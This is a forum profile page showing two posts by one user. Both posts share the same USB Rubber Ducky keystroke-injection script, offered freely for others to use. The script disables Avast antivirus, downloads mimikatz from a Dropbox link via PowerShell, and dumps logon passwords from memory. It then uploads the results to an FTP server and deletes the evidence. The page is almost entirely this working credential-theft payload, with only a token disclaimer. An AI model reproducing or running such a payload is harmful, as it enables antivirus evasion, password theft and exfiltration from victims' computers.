Jump to content

kirito

Members
 View Profile  See their activity

  • Posts

    2

  • Joined

  • Last visited

 Content Type 

Posts posted by kirito

    I need help to create a Rubber Ducky Payload

    in Classic USB Rubber Ducky

    Posted

    Just go on google there are loads, here's one that I made for free:

    REM This is a rough version of usb rubber ducky code to disable REM avast, download mimikatz, and upload the password text file REM to an ftp server, feel free to make changes, this is a rough
    REM guidline :)
    DELAY 2000
    WINDOWS r
    DELAY 400
    REM You may need to change this to a different location
    STRING "C:\Program Files\AVAST Software\Avast\AvastUI.exe"
    ENTER
    DELAY 2000
    REM this is going to settings
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    REM should be over settings
    ENTER
    DELAY 100
    DOWNARROW
    DELAY 300
    RIGHTARROW
    DELAY 200
    RIGHTARROW
    DELAY 200
    ENTER
    DELAY 350
    DOWNARROW
    DELAY 100
    ENTER
    DELAY 100
    ALT y
    DELAY 100
    ALT F4
    DELAY 500
    ALT F4
    REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs)
    DELAY 3000
    CONTROL ESCAPE
    DELAY 1000
    STRING cmd
    DELAY 1000
    CTRL-SHIFT ENTER
    DELAY 1000
    ALT y
    DELAY 300
    ENTER
    STRING powershell (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/retct66be69wwqm/mimikatz.exe?dl=1,%TEMP%\mimikatz.exe')
    REM <THIS IS MIMIKATZ I TAKE NO RESPONSIBILITY FOR ANYONES
    REM ACTIONS WITH THIS TOOl>
    DELAY 300
    ENTER
    DELAY 3000
    STRING %TEMP%\mimikatz.exe
    DELAY 300
    ENTER
    DELAY 3000
    STRING privilege::debug
    DELAY 300
    ENTER
    DELAY 1000
    STRING sekurlsa::logonPasswords full
    DELAY 300
    ENTER
    DELAY 1000
    STRING exit
    DELAY 300
    ENTER
    DELAY 100
    STRING del %TEMP%\mimikatz.exe
    DELAY 300
    ENTER
    DELAY 200
    STRING exit
    DELAY 600
    ALT SPACE
    DELAY 400
    STRING e
    DELAY 400
    STRING s
    DELAY 200
    ENTER
    DELAY 500
    WINDOWS r
    DELAY 350
    STRING notepad
    DELAY 200
    ENTER
    CONTROL v
    DELAY 600
    CONTROL s
    STRING %USERPROFILE%\mimikatz.txt
    ENTER
    DELAY 500
    ALT F4
    DELAY 500
    WINDOWS r
    DELAY 300
    STRING cmd
    DELAY 100
    ENTER
    DELAY 600
    STRING cd %USERPROFILE%
    STRING ftp <YOUR FTP SERVER>
    ENTER
    DELAY 500
    STRING <YOUR USERNAME>
    ENTER
    DELAY 500
    STRING <YOUR PASSWORD>
    ENTER
    DELAY 800
    STRING put mimikatz.txt
    ENTER
    DELAY 600
    STRING bye
    ENTER
    DELAY 700
    STRING DEL /F /S /Q /A "mimikatz.txt"
    ENTER
    DELAY 300
    ALT SPACE
    DELAY 500
    STRING c


    USB rubber ducky turn off avast, run mimikatz and upload passwords

    in Classic USB Rubber Ducky

    Posted

    I wrote this script for my usb rubber ducky since i couldn't find any other working scripts to turn off avast etc.

    The script turns off avast, downloads and executes mimikatz then uploads passwords to an ftp server. You do

    need to customise it for your own ftp server and possibly the location of AvastUI.exe.

    So here's the code :) :

    REM This is a rough version of usb rubber ducky code to disable REM avast, download mimikatz, and upload the password text file REM to an ftp server, feel free to make changes, this is a rough
    REM guidline :)
    DELAY 2000
    WINDOWS r
    DELAY 400
    REM You may need to change this to a different location
    STRING "C:\Program Files\AVAST Software\Avast\AvastUI.exe"
    ENTER
    DELAY 2000
    REM this is going to settings
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    DOWNARROW
    DELAY 100
    REM should be over settings
    ENTER
    DELAY 100
    DOWNARROW
    DELAY 300
    RIGHTARROW
    DELAY 200
    RIGHTARROW
    DELAY 200
    ENTER
    DELAY 350
    DOWNARROW
    DELAY 100
    ENTER
    DELAY 100
    ALT y
    DELAY 100
    ALT F4
    DELAY 500
    ALT F4
    REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs)
    DELAY 3000
    CONTROL ESCAPE
    DELAY 1000
    STRING cmd
    DELAY 1000
    CTRL-SHIFT ENTER
    DELAY 1000
    ALT y
    DELAY 300
    ENTER
    STRING powershell (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/retct66be69wwqm/mimikatz.exe?dl=1,%TEMP%\mimikatz.exe')
    REM <THIS IS MIMIKATZ I TAKE NO RESPONSIBILITY FOR ANYONES
    REM ACTIONS WITH THIS TOOl>
    DELAY 300
    ENTER
    DELAY 3000
    STRING %TEMP%\mimikatz.exe
    DELAY 300
    ENTER
    DELAY 3000
    STRING privilege::debug
    DELAY 300
    ENTER
    DELAY 1000
    STRING sekurlsa::logonPasswords full
    DELAY 300
    ENTER
    DELAY 1000
    STRING exit
    DELAY 300
    ENTER
    DELAY 100
    STRING del %TEMP%\mimikatz.exe
    DELAY 300
    ENTER
    DELAY 200
    STRING exit
    DELAY 600
    ALT SPACE
    DELAY 400
    STRING e
    DELAY 400
    STRING s
    DELAY 200
    ENTER
    DELAY 500
    WINDOWS r
    DELAY 350
    STRING notepad
    DELAY 200
    ENTER
    CONTROL v
    DELAY 600
    CONTROL s
    STRING %USERPROFILE%\mimikatz.txt
    ENTER
    DELAY 500
    ALT F4
    DELAY 500
    WINDOWS r
    DELAY 300
    STRING cmd
    DELAY 100
    ENTER
    DELAY 600
    STRING cd %USERPROFILE%
    STRING ftp <YOUR FTP SERVER>
    ENTER
    DELAY 500
    STRING <YOUR USERNAME>
    ENTER
    DELAY 500
    STRING <YOUR PASSWORD>
    ENTER
    DELAY 800
    STRING put mimikatz.txt
    ENTER
    DELAY 600
    STRING bye
    ENTER
    DELAY 700
    STRING DEL /F /S /Q /A "mimikatz.txt"
    ENTER
    DELAY 300
    ALT SPACE
    DELAY 500
    STRING c


×
×
  • Create New...